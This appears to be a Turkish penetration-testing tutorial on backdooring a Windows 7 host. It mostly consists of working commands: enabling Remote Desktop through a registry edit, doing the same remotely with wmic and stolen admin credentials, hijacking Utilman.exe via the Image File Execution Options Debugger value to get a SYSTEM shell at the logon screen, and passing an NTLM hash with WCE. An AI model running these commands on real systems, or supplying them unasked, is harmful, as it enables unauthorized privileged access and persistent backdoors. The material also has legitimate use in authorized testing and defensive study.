Mevcut durumda 10.68.35.150 IP adresli bilgisayara uzaktan erişim sağlanamamaktadır.
telnet 10.68.35.150 3389
Komut satırından uzak masaüstü bağlantısını açmak için kullanılabilecek komut aşağıdaki gibidir.
C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
Sızma testleri sırasında, 10.68.35.150 IP adresli bilgisayarda, yerel yönetici haklarına sahip bir kullanıcının erişim bilgilerinin Derya/Dd123456 olacak şekilde elde edilmiş olsun. Bu kullanıcıya ait erişim bilgileri ve Wmic aracı kullanılarak, uzak masaüstü bağlantısı aşağıdaki gibi etkinleştirilebilir.
wmic /node:10.68.35.150 /user:Derya /password:Dd123456 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f’
Normalde standart bir Windows 7 bilgisayarın oturum açma ekranı aşağıdaki gibidir. Windows oturum açma ekranında iken, Windows+U tuş takımına basıldığında veya sol alttaki ikona basıldığında, Utilman.exe adlı bir uygulama çalışır. Böylece, Ease of Access ekranı ile karşılaşılır.
Not: Benzer uygulamalar aşağıdaki gibi sıralanabilir.
- Sethc.exe –> Tetiklleyici: 5 kere Shift tuşu
- Utilman.exe –> Tetiklleyici: Windows tuşu + U
- Osk.exe –> Tetiklleyici: Ekrandaki On-screen tuşu
- Magnify.exe –> Tetiklleyici: Windows tuşu + =
- Narrator.exe –> Tetiklleyici: Windows tuşu + Enter
Ease of Access ve Image File Execution Options özelliği kötüye kullanılarak, aşağıdaki komutla Windows 7 bir bilgisayara arka kapı bırakılabilir.
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v Debugger /t REG_SZ /d cmd.exe /f
Hedef bilgisayarda yerel yönetici haklarına sahip Derya kullanıcısının erişim bilgileri ve Wmic aracı kullanılarak, br arka kapı aşağıdaki gibi bırakılabilir:
wmic /node:10.68.35.150 /user:Derya /password:Dd123456 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v “Debugger” /t REG_SZ /d “cmd.exe” /f’
Böylece, belirtilen değişiklikler yapılıp RDP yapıldıktan sonra (veya fiziksel erişim elde edildikten sonra), Windows oturum açma ekranına gelindiğinde, sol alttaki Ease of Access ikonuna tıklandığında (veya Windows+U tuş kombinasyonuna basıldığında), Winlogon.exe prosesinin çalıştığı haklar ile (SYSTEM hakları ile) komut satırı elde edilmiş olur.
İpucu – 1: Hedef bilgisayarda yerel yönetici haklarına sahip kullanıcının erişim bilgileri (Derya\Dd123456) açık olarak biliniyorsa ve Wmic komut satırında bu bilgilerin açık olarak yazılması istenmiyosa; saldırının gerçekleştirileceği bilgisayarda, bu erişim bilgileri ile aynı olacak şekilde bir kullanıcı hesabı oluşturulur ve oluşturulan bu kullanıcı ile oturum açılabilir. Böylece, hedef bilgisayardaki yerel yöneticinin parolası açık bir şekilde yazılmamış olur. Bu durumda kullanılabilecek komutlar sırasıyla aşağıdaki gibidir.
wmic /node:10.68.35.150 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f’
wmic /node:10.68.35.150 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v “Debugger” /t REG_SZ /d “cmd.exe” /f’
İpucu – 2: Hedef bilgisayarda yerel yönetici haklarına sahip kullanıcının erişim bilgileri (Derya\Dd123456) açık olarak bilinmiyor, ancak bu kullanıcıya ait parola özeti (aad3b435b51404eeaad3b435b51404ee:b76da09e06b5a4c0e1feed803cc2fde9) biliniyorsa; saldırının gerçekleştirileceği bilgisayara ait RAM üzerindeki erişim bilgileri WCE aracı ile değiştirilir. Bu durumda kullanılabilecek komutlar sırasıyla aşağıdaki gibidir.
wce -s WORKGROUP:Derya:aad3b435b51404eeaad3b435b51404ee:b76da09e06b5a4c0e1feed803cc2fde9
wmic /node:10.68.35.150 /user:Derya process call create ‘C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f’
wmic /node:10.68.35.150 /user:Derya process call create ‘C:\Windows\system32\reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v “Debugger” /t REG_SZ /d “cmd.exe” /f’
Not: Parola sorgu ekranının çıkmaması için wmic komutuda parola istenen kısım boş olarak (/password:””) da belirtilebilir.